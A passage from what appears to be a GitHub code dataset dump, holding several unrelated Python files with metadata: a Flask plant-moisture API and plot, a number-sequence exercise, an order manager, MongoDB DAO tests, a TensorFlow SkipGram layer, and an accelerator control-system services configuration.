import Flask, jsonify, render_template\nimport sqlite3 as sql\nimport numpy as np\nimport datetime\nimport os\n\napp = Flask(__name__)\n\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sql.connect(db_file)\n except sql.Error as e:\n print(e)\n \n return conn\n\n\n@app.route('/orange/api/v1.0/data', methods=['GET'])\ndef get_data():\n conn = None\n try:\n conn = sql.connect(\"moisture.db\")\n except sql.Error as e:\n print(e)\n \n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM moisture ORDER BY id LIMIT 500\")\n\n data = cur.fetchall()\n return jsonify({'data': data})\n\n@app.route('/plot')\ndef chartTest():\n\n conn = None\n try:\n conn = sql.connect(\"/home/callum/Dev/plantproj/moisture.db\")\n except sql.Error as e:\n print(e)\n plt.clf()\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM moisture ORDER BY id DESC LIMIT 500\")\n\n data = cur.fetchall()\n dates = []\n levels = []\n #print(data)\n\n for idx, date, moisture in data:\n date = datetime.datetime.strptime(date , \"%Y-%m-%d %H:%M:%S.%f\")\n dates.append(date)\n levels.append(moisture)\n \n conn.close()\n plt.plot_date(dates, levels)\n \n plt.savefig('/home/callum/Dev/plantproj/static/images/new_plot.jpg')\n return render_template('plot.html', name = 'new_plot', url ='static/images/new_plot.jpg')\n\n\n\n\nif __name__ == '__main__':\n print(os.getcwd())\n app.run(\"0.0.0.0\" , 8080)\n\n\n\n\t\n","repo_name":"cgfb94/plantproj","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27096947052","text":"n = int(input(\"Enter the length of the sequence: \"))\n\nnum_1 = 1\nnum_2 = 2\nnum_3 = 3\n\nfor i in range(1, n+1):\n if 1 <= i <= 3:\n print(i, end=\", \")\n else:\n new_num = num_1+num_2+num_3\n num_1 = num_2\n num_2 = num_3\n num_3 = new_num\n print(num_3, end=\", 
\")\n\n","repo_name":"DongusJr/Verkefni_HR_2019_Haust","sub_path":"Undirbuningur_lokapróf/assignment_5/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28654368224","text":"import json\r\nfrom dstruct.order import Order\r\nfrom dstruct.priority_queue import PriorityQueue\r\n\r\n\r\nclass OrderManager:\r\n\r\n def __init__(self):\r\n self.order_queue = PriorityQueue()\r\n\r\n def read_json(self, filename):\r\n\r\n f = open(filename)\r\n order_data = json.load(f)\r\n\r\n # Iterating through the json data\r\n for id in order_data.keys():\r\n id_keys = order_data[id].keys()\r\n\r\n # Check if order_date, priority, and quantity are keys\r\n # if \"order_date\" in id_keys and \"priority\" in id_keys and \"quantity\" in id_keys:\r\n try:\r\n order = Order(order_data[id][\"order_date\"].strip(),\r\n order_data[id][\"priority\"].strip(),\r\n order_data[id][\"quantity\"])\r\n\r\n try:\r\n self.order_queue.enqueue(order)\r\n except Exception as e:\r\n # THERE ARE 8 INVALID FIELDS\r\n print(type(e).__name__, ': ', str(e), \"Order ID:\", id, \">>\", order_data[id], sep=\" \")\r\n\r\n except Exception as e:\r\n # THERE ARE 5 KEY ERRORS\r\n print(type(e).__name__, ': ', str(e), \"Order ID:\", id, \">>\", order_data[id], sep=\" \")\r\n\r\n def print_info(self):\r\n # Output order data\r\n print(\"Order Data:\", self.order_queue)\r\n\r\n # There 87 orders in the order queue\r\n print(\"Order Queue Size\", self.order_queue.size())\r\n\r\n\r\ndef main():\r\n om = OrderManager()\r\n om.read_json(\"orders.json\")\r\n om.print_info()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"xaneeshax/DS-NEU","sub_path":"Advanced Programming/outputs/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16775425065","text":"from src.dao.version_dao import VersionDao\nfrom src.models.version_model import VersionModel\n\ndefault_version = 'v001_data_init'\ndefault_version_dict = {\n 'version': default_version\n}\n\n\ndef test_version_dao_inserts_record(mongo_db):\n version_model = _build_version_model()\n version_dao = VersionDao(mongo_db)\n\n version_id = version_dao.insert(version_model)\n\n # cleanup\n assert version_dao.delete_one(version_model.version)\n\n assert version_id\n\n\ndef test_version_does_not_find_record(mongo_db):\n version_dao = VersionDao(mongo_db)\n result = version_dao.find_one(default_version)\n\n assert result is None\n\n\ndef test_version_does_find_record(mongo_db):\n version = _build_version_model()\n version_dao = VersionDao(mongo_db)\n\n expected_version_id = version_dao.insert(version)\n\n result_version = version_dao.find_one(default_version)\n\n # cleanup\n assert version_dao.delete_one(default_version)\n\n assert expected_version_id == str(result_version._id)\n\n\ndef test_version_dao_delete_no_record(mongo_db):\n version_dao = VersionDao(mongo_db)\n deleted_count = version_dao.delete_one(default_version)\n assert 0 == deleted_count\n\n\ndef test_version_dao_deletes_record(mongo_db):\n version = _build_version_model()\n version_dao = VersionDao(mongo_db)\n version_dao.insert(version)\n\n deleted_count = version_dao.delete_one(default_version)\n\n assert 1 == deleted_count\n\n\ndef _build_version_model() -> VersionModel:\n version_model = VersionModel.from_json(default_version_dict)\n\n return 
version_model\n","repo_name":"DEV3L/python-heroku-learning-journal-api","sub_path":"src/dao/version_dao_test.py","file_name":"version_dao_test.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13682560028","text":"import tensorflow as tf\n\n\n# ------------- task 2.2 \"Model\" -------------------\nclass SkipGram(tf.keras.layers.Layer):\n \"\"\"A custom SkipGram layer\"\"\"\n\n def __init__(self, vocabulary_size, embedding_size):\n \"\"\" Constructor \"\"\"\n super(SkipGram, self).__init__()\n\n # Initialize vocabulary and embedding size.\n self.vocabulary_size = vocabulary_size\n self.embedding_size = embedding_size\n self.build(\"\")\n\n def build(self, input_shape) -> None:\n \"\"\"Instantiation of weights and bias\n\n :param input_shape: shape for weights and bias creation.\n \"\"\"\n\n # initialize the embedding and score matrices of correct shape by using vocabulary and embedding size.\n self.embedding_weights = self.add_weight(\n shape=(self.vocabulary_size, self.embedding_size),\n initializer='random_normal')\n\n self.score_weights = self.add_weight(\n shape=(self.vocabulary_size, self.embedding_size),\n initializer='random_normal')\n\n self.score_bias = self.add_weight(\n shape=(self.vocabulary_size,),\n initializer='zeros')\n\n @tf.function\n def call(self, inputs: tf.Tensor, target: tf.Tensor) -> tf.Tensor:\n \"\"\"Forward propagation\n\n :param inputs: Inputs for layer.\n \"\"\"\n\n # get the embeddings using tf.nn.embedding_lookup()\n embedding = tf.nn.embedding_lookup(self.embedding_weights, inputs)\n\n # calculate and return the loss using tf.nn.nce_loss\n loss = tf.nn.nce_loss(\n weights=self.score_weights,\n biases=self.score_bias,\n labels=target,\n inputs=embedding,\n num_classes=self.vocabulary_size,\n num_sampled=3\n\n )\n\n return tf.reduce_mean(loss)\n","repo_name":"pondreka/IANNswtf","sub_path":"hw_10/skipgram.py","file_name":"skipgram.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3377433580","text":"#!/usr/bin/env python-sirius\n\nimport os\nimport yaml\nfrom siriuspy import util\nfrom siriuspy.namesys import SiriusPVName as _PVName\nfrom siriuspy.search import PSSearch, HLTimeSearch, IDSearch\nfrom siriuspy.currinfo.csdev import get_currinfo_database\nfrom siriuspy.diagsys.rfdiag.csdev import Const as RFDiagConst\nfrom siriuspy.diagsys.lidiag.csdev import Const as LIDiagConst\n\n\nclass ServiceConfig:\n \"\"\"Services configuration.\"\"\"\n\n SERVICES_CSCONSTS = {\n 'csconsts': 'IA-16RaBbB-CO-IOCSrv'\n }\n\n SERVICES = {\n 'as-ap-currinfo': 'IA-14RaDiag03-CO-IOCSrv',\n 'as-ap-machshift': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ap-diag': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ap-opticscorr': 'CA-RaTim-CO-IOCSrv',\n 'as-ap-posang': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ap-sofb': 'CA-RaTim-CO-IOCSrv',\n 'as-ap-injctrl': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-tbts-bodip': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia01': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia02': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia03': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia04': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia05': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia06': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia07': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia08': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia09': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia10': 
'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia11': 'IA-16RaBbB-CO-IOCSrv',\n 'as-ps-dclinks-ia12': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia13': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia14': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia15': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia16': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia17': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-ps-dclinks-ia18': 'CA-RaTim-CO-IOCSrv',\n 'as-ps-dclinks-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 'as-ps-dclinks-ia20': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'as-pu-conv': 'IA-14RaDiag03-CO-IOCSrv',\n 'as-ti-general': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ti-bpms-corrs': 'CA-RaTim-CO-IOCSrv',\n 'si-ti-bpms-corrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ti-trims-skews': 'IA-18RaDiag04-CO-IOCSrv',\n 'li-ap-energy': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-spect-quads-lens': 'IA-16RaBbB-CO-IOCSrv',\n 'li-ps-corrs': 'IA-16RaBbB-CO-IOCSrv',\n 'li-ps-slnds': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-conv': 'IA-14RaDiag03-CO-IOCSrv',\n 'li-ps-diag': 'IA-16RaBbB-CO-IOCSrv',\n 'tb-ps-dips': 'IA-18RaDiag04-CO-IOCSrv',\n 'tb-ps-quads': 'IA-18RaDiag04-CO-IOCSrv',\n 'tb-ps-corrs': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-dips': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-quads': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-sexts': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia01': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia02': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia04': 'CA-RaTim-CO-IOCSrv',\n 'bo-ps-corrs-ia05': 'CA-RaTim-CO-IOCSrv',\n 'bo-ps-corrs-ia07': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'bo-ps-corrs-ia10': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia11': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia13': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia14': 'IA-18RaDiag04-CO-IOCSrv',\n 'bo-ps-corrs-ia16': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia17': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'bo-ps-corrs-ia20': 'CA-RaTim-CO-IOCSrv',\n 'ts-ps-dips': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'ts-ps-quads': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'ts-ps-corrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ap-fofb': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-stabinfo': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-id-conv': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-id-epu50': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-sofb': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-dips': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-quads-qfq': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-quads-qd': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-sexts-sda12b2-sfa0p0-sda0p0': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-sexts-sfa12-sda3p1-sfb0-sdb01': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-sexts-sfb12-sdb3-sfp12-sdp23': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-corrs-c2m12-ia01': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia02': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia04': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia06': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia07': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia08': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia09': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia11': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia12': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia14': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia15': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia16': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c2m12-ia17': 'IA-16RaBbB-CO-IOCSrv',\n 
'si-ps-corrs-c2m12-ia18': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia19': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c2m12-ia20': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia01': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia02': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-corrs-c134-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia04': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia05': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia07': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia09': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia11': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia12': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-corrs-c134-ia14': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia15': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia16': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-c134-ia17': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-corrs-c134-ia18': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-c134-ia19': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-corrs-c134-ia20': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-corrs-qs-sb-ia10': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-corrs-sa-ia17': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia01': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia02': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia03': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia04': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia07': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia08': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia09': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia10': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia11': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-trims-qs-m12-ia12': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia15': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia16': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia17': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia18': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-m12-ia19': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-m12-ia20': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia01': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia02': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia03': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia04': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia05': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia06': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia07': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia08': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia09': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia10': 'IA-14RaDiag03-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia11': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia12': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-trims-qs-c1234-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia15': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-trims-qs-c1234-ia16': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia17': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia18': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-trims-qs-c1234-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 
'si-ps-trims-qs-c1234-ia20': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia01': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia02': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia03': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia04': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia05': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia06': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia07': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia08': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia09': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia10': 'IA-20RaDiag01-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia11': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia12': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'si-ps-conv-fastcorrs-ia13': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-conv-fastcorrs-ia14': 'IA-20RaDiag02-CO-IOCSrv-1',\n 'si-ps-conv-fastcorrs-ia15': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia16': 'IA-16RaBbB-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia17': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia18': 'CA-RaTim-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia19': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-conv-fastcorrs-ia20': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ps-diag-fastcorrs': 'IA-20RaDiag02-CO-IOCSrv-2',\n 'it-ps-lens': 'IA-18RaDiag04-CO-IOCSrv',\n 'bl-ap-imgproc': 'LA-RaCtrl-CO-Srv-1',\n 'si-ap-idff-epu50': 'IA-18RaDiag04-CO-IOCSrv',\n 'si-ap-idff-papu50': 'IA-18RaDiag04-CO-IOCSrv',\n }\n\n STACKS = {\n 'as-ps-dclinks': {\n 'tbts-bodip': 'as-ps-dclinks-tbts-bodip',\n 'ia01': 'as-ps-dclinks-ia01',\n 'ia02': 'as-ps-dclinks-ia02',\n 'ia03': 'as-ps-dclinks-ia03',\n 'ia04': 'as-ps-dclinks-ia04',\n 'ia05': 'as-ps-dclinks-ia05',\n 'ia06': 'as-ps-dclinks-ia06',\n 'ia07': 'as-ps-dclinks-ia07',\n 'ia08': 'as-ps-dclinks-ia08',\n 'ia09': 'as-ps-dclinks-ia09',\n 'ia10': 'as-ps-dclinks-ia10',\n 'ia11': 'as-ps-dclinks-ia11',\n 'ia12': 'as-ps-dclinks-ia12',\n 'ia13': 'as-ps-dclinks-ia13',\n 'ia14': 'as-ps-dclinks-ia14',\n 'ia15': 'as-ps-dclinks-ia15',\n 'ia16': 'as-ps-dclinks-ia16',\n 'ia17': 'as-ps-dclinks-ia17',\n 'ia18': 'as-ps-dclinks-ia18',\n 'ia19': 'as-ps-dclinks-ia19',\n 'ia20': 'as-ps-dclinks-ia20',\n },\n 'as-ti': {\n 'general': 'as-ti-general',\n 'bo-bpms-corrs': 'bo-ti-bpms-corrs',\n 'si-bpms-corrs': 'si-ti-bpms-corrs',\n 'si-trims-skews': 'si-ti-trims-skews',\n },\n 'bo-ps-corrs': {\n 'ia01': 'bo-ps-corrs-ia01',\n 'ia02': 'bo-ps-corrs-ia02',\n 'ia04': 'bo-ps-corrs-ia04',\n 'ia05': 'bo-ps-corrs-ia05',\n 'ia07': 'bo-ps-corrs-ia07',\n 'ia08': 'bo-ps-corrs-ia08',\n 'ia10': 'bo-ps-corrs-ia10',\n 'ia11': 'bo-ps-corrs-ia11',\n 'ia13': 'bo-ps-corrs-ia13',\n 'ia14': 'bo-ps-corrs-ia14',\n 'ia16': 'bo-ps-corrs-ia16',\n 'ia17': 'bo-ps-corrs-ia17',\n 'ia20': 'bo-ps-corrs-ia20',\n },\n 'bo-ps-fams': {\n 'dips': 'bo-ps-dips',\n 'quads': ('bo-ps-quads', ('dips', )),\n 'sexts': ('bo-ps-sexts', ('dips', )),\n },\n 'bo-ps': {\n 'dips': 'bo-ps-dips',\n 'quads': ('bo-ps-quads', ('dips', )),\n 'sexts': ('bo-ps-sexts', ('dips', )),\n 'corrs-ia01': ('bo-ps-corrs-ia01', ('dips', )),\n 'corrs-ia02': ('bo-ps-corrs-ia02', ('dips', )),\n 'corrs-ia04': ('bo-ps-corrs-ia04', ('dips', )),\n 'corrs-ia05': ('bo-ps-corrs-ia05', ('dips', )),\n 'corrs-ia07': ('bo-ps-corrs-ia07', ('dips', )),\n 'corrs-ia08': ('bo-ps-corrs-ia08', ('dips', )),\n 'corrs-ia10': ('bo-ps-corrs-ia10', ('dips', )),\n 'corrs-ia11': ('bo-ps-corrs-ia11', ('dips', )),\n 'corrs-ia13': ('bo-ps-corrs-ia13', ('dips', )),\n 'corrs-ia14': ('bo-ps-corrs-ia14', ('dips', )),\n 'corrs-ia16': ('bo-ps-corrs-ia16', 
('dips', )),\n 'corrs-ia17': ('bo-ps-corrs-ia17', ('dips', )),\n 'corrs-ia20': ('bo-ps-corrs-ia20', ('dips', )),\n },\n 'li-ps': {\n 'spect-quads-lens': 'li-ps-spect-quads-lens',\n 'corrs': 'li-ps-corrs',\n 'slnds': 'li-ps-slnds',\n 'conv': ('li-ps-conv', ('spect-quads-lens', 'corrs', 'slnds')),\n 'diag': ('li-ps-diag', ('spect-quads-lens', 'corrs', 'slnds')),\n },\n 'tb-ps': {\n 'dips': 'tb-ps-dips',\n 'quads': ('tb-ps-quads', ('dips', )),\n 'corrs': ('tb-ps-corrs', ('dips', )),\n },\n 'ts-ps': {\n 'dips': 'ts-ps-dips',\n 'quads': ('ts-ps-quads', ('dips', )),\n 'corrs': ('ts-ps-corrs', ('dips', )),\n },\n 'si-ps': {\n 'dips': 'si-ps-dips',\n 'quads-qd': ('si-ps-quads-qd', ('dips', )),\n 'quads-qfq': ('si-ps-quads-qfq', ('dips', )),\n 'sexts-sda12b2-sfa0p0-sda0p0': ('si-ps-sexts-sda12b2-sfa0p0-sda0p0', ('dips', )),\n 'sexts-sfa12-sda3p1-sfb0-sdb01': ('si-ps-sexts-sfa12-sda3p1-sfb0-sdb01', ('dips', )),\n 'sexts-sfb12-sdb3-sfp12-sdp23': ('si-ps-sexts-sfb12-sdb3-sfp12-sdp23', ('dips', )),\n 'corrs-c2m12-ia01': ('si-ps-corrs-c2m12-ia01', ('dips', )),\n 'corrs-c2m12-ia02': ('si-ps-corrs-c2m12-ia02', ('dips', )),\n 'corrs-c2m12-ia03': ('si-ps-corrs-c2m12-ia03', ('dips', )),\n 'corrs-c2m12-ia04': ('si-ps-corrs-c2m12-ia04', ('dips', )),\n 'corrs-c2m12-ia05': ('si-ps-corrs-c2m12-ia05', ('dips', )),\n 'corrs-c2m12-ia06': ('si-ps-corrs-c2m12-ia06', ('dips', )),\n 'corrs-c2m12-ia07': ('si-ps-corrs-c2m12-ia07', ('dips', )),\n 'corrs-c2m12-ia08': ('si-ps-corrs-c2m12-ia08', ('dips', )),\n 'corrs-c2m12-ia09': ('si-ps-corrs-c2m12-ia09', ('dips', )),\n 'corrs-c2m12-ia10': ('si-ps-corrs-c2m12-ia10', ('dips', )),\n 'corrs-c2m12-ia11': ('si-ps-corrs-c2m12-ia11', ('dips', )),\n 'corrs-c2m12-ia12': ('si-ps-corrs-c2m12-ia12', ('dips', )),\n 'corrs-c2m12-ia13': ('si-ps-corrs-c2m12-ia13', ('dips', )),\n 'corrs-c2m12-ia14': ('si-ps-corrs-c2m12-ia14', ('dips', )),\n 'corrs-c2m12-ia15': ('si-ps-corrs-c2m12-ia15', ('dips', )),\n 'corrs-c2m12-ia16': ('si-ps-corrs-c2m12-ia16', ('dips', )),\n 'corrs-c2m12-ia17': ('si-ps-corrs-c2m12-ia17', ('dips', )),\n 'corrs-c2m12-ia18': ('si-ps-corrs-c2m12-ia18', ('dips', )),\n 'corrs-c2m12-ia19': ('si-ps-corrs-c2m12-ia19', ('dips', )),\n 'corrs-c2m12-ia20': ('si-ps-corrs-c2m12-ia20', ('dips', )),\n 'corrs-c134-ia01': ('si-ps-corrs-c134-ia01', ('dips', )),\n 'corrs-c134-ia02': ('si-ps-corrs-c134-ia02', ('dips', )),\n 'corrs-c134-ia03': ('si-ps-corrs-c134-ia03', ('dips', )),\n 'corrs-c134-ia04': ('si-ps-corrs-c134-ia04', ('dips', )),\n 'corrs-c134-ia05': ('si-ps-corrs-c134-ia05', ('dips', )),\n 